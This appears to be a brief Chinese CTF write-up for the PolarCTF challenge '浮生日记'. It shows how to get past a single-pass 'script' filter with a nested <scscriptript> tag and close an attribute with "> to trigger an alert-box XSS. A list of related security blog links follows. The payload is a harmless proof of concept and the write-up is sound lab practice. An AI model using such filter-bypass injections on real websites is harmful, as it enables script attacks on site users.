【PolarCTF】浮生日记

很明显是个XSS,尝试常规语句发现会过滤script

尝试双写

复制代码
<scscriptript>alert(123)</scscriptript>

可以看到只过滤了一次<script>,但是还没有触发弹窗

我们看下源代码,发现需要对value进行闭合

那么payload如下:

复制代码
"><scscriptript>alert(123)</scscriptript>
相关推荐
世界尽头与你2 小时前
Flask开启Debug模式
后端·网络安全·渗透测试·flask
Whoami!3 小时前
⓫⁄₄ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 搜索Windows的敏感信息
windows·网络安全·信息安全·信息收集
是逍遥子没错3 小时前
关于国内通用OA的渗透测试思路-仅供测试切勿违法使用
安全·web安全·网络安全·渗透测试·系统安全·漏洞挖掘
学习中的DGR13 小时前
[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程
sql·安全·web安全·网络安全·php
半路_出家ren18 小时前
1.古典密码概述
python·网络安全·密码学·古典密码·加密方式
cws20040119 小时前
MFA双因素用户使用手册
运维·windows·网络安全·github·邮件·邮箱
天荒地老笑话么21 小时前
为什么访问 http://example.com 和 https://example.com 安全性不同(明文 vs 加密)
网络安全
半路_出家ren1 天前
23.Python处理SSH和Redis
运维·网络·redis·python·网络安全·ssh·paramiko
GCKJ_08241 天前
【观成科技】C2框架AdaptixC2加密流量分析
网络安全·同态加密